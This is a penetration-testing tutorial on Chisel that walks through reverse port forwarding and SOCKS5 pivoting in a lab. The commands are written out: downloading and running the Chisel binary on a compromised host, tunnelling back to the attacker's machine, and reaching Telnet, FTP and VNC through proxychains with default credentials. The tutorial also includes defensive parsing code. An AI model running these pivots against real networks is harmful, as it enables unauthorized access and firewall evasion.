A Detailed Guide on Chisel
Chisel port forwarding is a powerful technique that penetration testers and red teamers commonly use to bypass firewalls and securely access internal services. This guide explores how to use Chisel for tunneling traffic and setting up remote connections through local port forwarding and SOCKS5 proxies in various real-world scenarios.
Table of contents
- Introduction to Chisel
- Background of port forwarding
- Establish a connection with the remote host
- Local port forwarding – Example 1
- Local port forwarding – Example 2
- Establish Connection with SOCKS5 Proxy
- Configure SOCKS5 in proxychains4.conf file
- Banner grabbing of the remote host with proxychains
- Telnet Connection using proxychains
- FTP connection using proxychains
- VNC Viewer connection using proxychains
- Conclusion
Introduction to Chisel
Chisel is an open-source tool written in Go (Golang). It mainly helps users pass through firewalls, although it can also provide a secure endpoint into your network. Specifically, it operates as a fast TCP/UDP tunnel, transported over HTTP and secured via SSH. In the setup used in this guide, establishing a connection between a remote host and the attacking box requires two components: the attacking box, which acts as the server, and the remote host, which acts as the client.
Background of Port forwarding
Port forwarding in a computer network, also known as port mapping or network address translation (NAT), redirects a communication request from one address and port number combination to another while packets traverse a network gateway such as a firewall or a router. It is used to keep unwanted traffic out. A network administrator uses one IP address for all external communication on the internet while dedicating multiple internal servers with different IPs and ports to various tasks, based on organizational requirements.
Establish a connection with the remote host
We establish a connection with the remote host using valid credentials. The remote host serves as both a target and a tunneling point for the next hop; if another hop exists, the remote host functions as a routing point. We connect as the pentest user over the SSH protocol, which stands for Secure Socket Shell and transmits data in encrypted form. Once connected, we can view the internal network status with netstat, using the following options:
- -a show all sockets, listening and non-listening
- -n show numeric addresses and ports instead of resolving names
- -t show TCP sockets only
- -p show the process ID and name that owns each socket
ssh pentest@192.168.1.15 netstat -antp
Installation
Chisel installation is straightforward on Kali Linux, as it is available as a distribution package. We can install it using the command below.
apt install chisel
Once installed, Chisel port forwarding becomes an indispensable part of any attacker’s toolkit for navigating complex network environments.
Local port forwarding – Example 1
Reverse port forwarding lets us connect to services hosted on the remote host's internal network. Here we use the Chisel utility to achieve this, which takes several steps. In the first step, we set up a reverse Chisel server on our base machine (Kali), specifying port 5000.
Once our Chisel server is ready and reverse tunneling is enabled, we must transfer a Chisel binary to the remote host. You can download Chisel binaries for your system architecture from the official repository; all the latest binaries are available under the releases tab. As we are testing on a Linux system with AMD64 architecture, we selected the linux_amd64 binary (highlighted in the screenshot).
Download link: https://github.com/jpillora/chisel/releases
After cloning the repository and downloading the release archive, the file is saved in the Downloads folder in gzip format. Next, we unpack it using the gunzip utility. As mentioned earlier, we need to transfer it to the target system to set it up as a Chisel client. To transfer the file, we start a Python web server on our local system, which hosts the file on port 80.
git clone https://github.com/jpillora/chisel.git
gunzip chisel_1.7.7_linux_amd64.gz
python3 -m http.server 80
Transferring and Executing Chisel on the Remote Host
We downloaded the Chisel binary into the remote host's /tmp directory, where all users have write access. Then we made the binary executable; without that, we cannot run it, since a file downloaded into /tmp as a low-privileged user is not executable by default. To establish a remote connection, we need both a Chisel server and a Chisel client: the Chisel server is the attacking box, and the Chisel client is the target machine. As we had already set up the server on port 5000, we now connect to it. We run Chisel in client mode, specify the server IP address and port (5000), and then the remote spec R:4444:localhost:8080, which exposes the internal HTTP service (port 8080 on the remote host) on port 4444 of the attacking box.
wget 192.168.1.205/chisel_1.7.7_linux_amd64
chmod 777 chisel_1.7.7_linux_amd64
./chisel_1.7.7_linux_amd64 client 192.168.68.141:5000 R:4444:localhost:8080
Local port forwarding – Example 2
Alternatively, we can access the internal HTTP service via the attacker's IP address instead of the loopback interface. To do so, we must install Chisel on the target machine; in this case, an Ubuntu system. Because Chisel is written in Go, we first install the Go toolchain on the target using the command below.
apt install golang
Next, we download Chisel from its official repository and build it on the target system. The go build tool, which aims to replace Makefiles, automates builds for simple Go projects: it creates a dependency graph of all local imports and compiles them in the correct order using the gc Go compiler. The -ldflags option (linker flags) passes parameters to the underlying linker in the Go toolchain. Although not mandatory, the -s and -w linker flags help reduce binary size. After changing into the cloned Chisel directory, we build it with go build.
git clone https://github.com/jpillora/chisel.git
apt install golang
go build -ldflags="-s -w"
Then we set up a Chisel server on port 5000 on the attacking box, as in the previous example. In that example, we reached the service hosted on the remote internal network through the attacking box's loopback interface. This time we will access the HTTP service on port 8888 on the attacker side. The Ubuntu machine, our client, connects to the Chisel server (192.168.1.205) on port 5000. Once the tunnel is created, the HTTP service running on the remote host's loopback interface (127.0.0.1) becomes reachable on port 8888.
./chisel client 192.168.1.205:5000 R:8888:localhost:8080
Once the connection to the Chisel server is established, we can access the HTTP service from the attacking box on port 8888.
Establish Connection with SOCKS5 Proxy
During an internal assessment, we may compromise a system that communicates with another system through a different adapter or on a different subnet. We can check this with ipconfig/ifconfig, which shows whether the system is attached to another network via a second adapter. In such scenarios, local port forwarding will not work, and we have to identify which ports are open for outbound traffic. As shown in the screenshot below, we could not establish a connection with the remote host.
To overcome this issue, we have to go through multiple steps. First, we set up a Chisel server on the attacking box on port 8000.
Configuring and Using SOCKS5 Proxy for Forwarding
Then we connect to the Chisel server from the Ubuntu box, requesting a reverse SOCKS proxy. Like most other proxy types, a SOCKS proxy hides the client's IP address and is often used to bypass geo-restrictions. Unlike an HTTP proxy, SOCKS does not interpret web data. SOCKS proxies are mainly used to reach services behind firewalls that limit regular client access. All communication can then be sent through the SOCKS5 proxy using utilities such as proxychains or proxychains4. The relevant Chisel options are:
- -p: listening port of the server (attacking box)
- --socks5: start an internal SOCKS4/SOCKS5 proxy
- --reverse: allow reverse port forwarding
We can also forward an individual target port using the command below. We connect to the server hosted on the attacking machine and then access the target service through the tunnel.
We can also enable the SOCKS proxy while setting up the Chisel server. In the example below, we set up a Chisel server on port 9001 with the SOCKS5 proxy enabled.
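The remote specs used in the two examples above (R:4444:localhost:8080, R:8888:localhost:8080) and the socks remotes in this section all follow one syntax. As an added example that is not from the original guide or the Chisel project, the Python below decodes that syntax so a defender reviewing a captured chisel client command line (for instance from EDR process telemetry) can state exactly which side opens a listener and where the traffic exits; the defaults are assumed from the Chisel README.

```python
"""Decode Chisel remote specs such as "R:4444:localhost:8080" into what listens where.
Assumes the README syntax: <local-host>:<local-port>:<remote-host>:<remote-port>/<proto>, "R:" = reverse, "socks" = built-in SOCKS5."""
from dataclasses import dataclass

@dataclass
class Remote:
    reverse: bool      # R: prefix -> the server listens and traffic exits through the client
    local_host: str    # interface the listener binds to
    local_port: int
    remote_host: str   # where the tunnel terminates ("socks" = internal SOCKS5 proxy)
    remote_port: int
    proto: str         # "tcp" or "udp"

def parse_remote(spec: str) -> Remote:
    reverse = spec.startswith("R:")
    spec = spec[2:] if reverse else spec
    proto = "tcp"
    if "/" in spec:                        # e.g. 1.1.1.1:53/udp
        spec, proto = spec.rsplit("/", 1)
    parts = spec.split(":")
    if parts[-1] == "socks":               # socks, 5000:socks, R:socks, R:5000:socks
        remote_host, remote_port, local, default_host = "socks", 1080, parts[:-1], "127.0.0.1"
    else:                                  # remote-port is required; remote-host defaults to 0.0.0.0
        remote_port = int(parts[-1])
        remote_host = parts[-2] if len(parts) >= 2 else "0.0.0.0"
        local, default_host = parts[:-2], "0.0.0.0"
    if len(local) > 2:
        raise ValueError(f"malformed remote {spec!r}")
    local_port = int(local[-1]) if local else remote_port   # local-port defaults to remote-port
    local_host = local[0] if len(local) == 2 else default_host
    return Remote(reverse, local_host, local_port, remote_host, remote_port, proto)

def describe(spec: str) -> str:
    """One-line statement of the exposure a remote creates, for triage notes."""
    r = parse_remote(spec)
    listener, exit_side = ("server", "client") if r.reverse else ("client", "server")
    dest = "its internal SOCKS5 proxy" if r.remote_host == "socks" else f"{r.remote_host}:{r.remote_port}"
    return (f"Chisel {listener} listens on {r.local_host}:{r.local_port}/{r.proto}; "
            f"traffic exits via the {exit_side} to {dest}")

def triage_cmdline(cmdline: str) -> list:
    """Decode every remote in a captured 'chisel client ...' command line.
    Assumes option values are attached with '=', e.g. --auth=user:pass."""
    argv = cmdline.split()
    if "client" not in argv:
        return []
    positional = [a for a in argv[argv.index("client") + 1:] if not a.startswith("-")]
    return [describe(r) for r in positional[1:]]   # positional[0] is the server address
```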
All of the above is configured at the system level, but how will the browser know that we want to reach the HTTP service through the proxy? We configure it in the browser as well; otherwise, we cannot browse any HTTP or HTTPS services. To do that, we manually set the browser's proxy settings to a SOCKS proxy with the loopback address 127.0.0.1 as the host, the port number, and the SOCKS version (SOCKS4 or SOCKS5, depending on what we are using). In this example, we use SOCKS5 on port 1080, with no proxy for the loopback interface. The same can be done with the FoxyProxy add-on for Mozilla Firefox.
Now we can access the services without any issues. We can verify this by accessing the target HTTP service; the request is sent through the proxy.
In situations where traditional forwarding fails due to network segmentation, Chisel port forwarding combined with SOCKS5 proxy can help create dynamic tunnels across subnets.
Configure SOCKS5 in proxychains4.conf file
If proxychains4 is not yet configured for a SOCKS5 proxy, we add an entry to its configuration file with any text editor. The configuration file is /etc/proxychains4.conf.
In the configuration file, we comment out the socks4 proxy entry if one is configured by default and add a socks5 entry on the loopback interface with the port number. Any port can be used, but in this example we use port 1080.
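As an added example that is not part of the original guide, the Python below makes the same proxychains4.conf change programmatically: it comments out every active entry in the [ProxyList] section (such as the default socks4 line) and inserts socks5 127.0.0.1 1080, and running it twice leaves the file unchanged. The sample configuration is constructed to resemble a default install, and the update_conf_file path is an assumption.

```python
"""Point proxychains4 at a local SOCKS5 listener by rewriting its [ProxyList] section.
Assumes the stock proxychains4.conf layout: one '[ProxyList]' section, one proxy per line."""
import re
from pathlib import Path

# Constructed sample resembling a default install, not a real file from the guide.
SAMPLE_CONF = """# proxychains.conf  VER 4.x (constructed sample)
strict_chain
proxy_dns
[ProxyList]
# add proxy here ...
socks4  127.0.0.1 9050
"""

def set_socks5_proxy(conf: str, host: str = "127.0.0.1", port: int = 1080) -> str:
    """Return conf with every active [ProxyList] entry commented out and a single
    'socks5 host port' entry in its place. Running it twice yields the same text."""
    wanted = f"socks5 {host} {port}"
    keep = re.compile(r"socks5\s+%s\s+%d" % (re.escape(host), port))
    out, in_list, header_at, added = [], False, None, False
    for line in conf.splitlines():
        stripped = line.strip()
        if stripped.startswith("["):                    # section header
            in_list = stripped.lower() == "[proxylist]"
            if in_list:
                header_at = len(out)
        elif in_list and stripped and not stripped.startswith("#"):
            if keep.fullmatch(stripped) and not added:  # already correct: keep exactly one
                added = True
            else:                                       # disable e.g. the default socks4 entry
                line = "# " + line
        out.append(line)
    if not added:
        if header_at is None:                           # no section at all: create it
            out.append("[ProxyList]")
            header_at = len(out) - 1
        out.insert(header_at + 1, wanted)
    return "\n".join(out) + "\n"

def update_conf_file(path: str = "/etc/proxychains4.conf") -> str:
    """Rewrite the file in place after saving a .bak copy; returns the new content."""
    p = Path(path)
    original = p.read_text()
    Path(path + ".bak").write_text(original)
    updated = set_socks5_proxy(original)
    p.write_text(updated)
    return updated
```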
Banner grabbing of the remote host with proxychains
Now, let's grab the banners of ports 21, 23, and 5900. Port 21 corresponds to FTP (File Transfer Protocol), 23 to Telnet, and 5900 to the VNC server. FTP transfers files, Telnet provides remote CLI-based connections, and VNC provides GUI-based remote connections. To grab these banners or reach the remote host at all, we must prefix every command with proxychains so that the request is routed through the tunnel we established. From the output, it is clear that all three ports are open. In our command, we used the -zvn options, which stand for:
- -n Do not do DNS or service lookups on the specified addresses, hostnames, or ports.
- -v Have nc give more verbose output.
- -z Have nc only scan for listening daemons, without sending any data to them.
proxychains nc -zvn 192.168.146.128 21 23 5900
Telnet Connection using proxychains
Telnet is a remote-access protocol that does not encrypt data in transit; it transmits everything in plain text. Let's establish a Telnet connection with the valid credentials msfadmin/msfadmin. As expected, we successfully established a remote session with the remote host over Telnet.
proxychains telnet 192.168.146.128
FTP connection using proxychains
FTP (File Transfer Protocol) is a network protocol for transmitting files between computers over Transmission Control Protocol/Internet Protocol (TCP/IP) connections. Within the TCP/IP suite, FTP is considered an application layer protocol. Let's connect with the same credentials we used for Telnet. We connected to FTP successfully, and with the ls command we can list the files available in the directory.
proxychains ftp 192.168.146.128
VNC Viewer connection using proxychains
In the last example, we connect with VNC Viewer. VNC Viewer runs on the local computer or mobile device you want to control from: a computer, tablet, or smartphone with VNC Viewer installed can access and control a computer in another location. This service runs on its default port, 5900. To establish a connection to VNC through the tunnel, we run the vncviewer utility under proxychains with the remote IP address, and we receive a GUI-based session.
proxychains vncviewer 192.168.146.128
Conclusion
We have explored Chisel briefly; it makes internal assessments much easier, especially when port forwarding is needed. We covered multiple techniques to establish a remote session with Chisel, with and without a SOCKS5 proxy, and looked at the role of proxychains in a tunneled connection. I hope you have learned something new today. Happy hacking!
Author: Subhash Paudel is a Penetration Tester and a CTF player who has a keen interest in various technologies and loves to explore more and more. Additionally, he is a technical writer at Hacking Articles.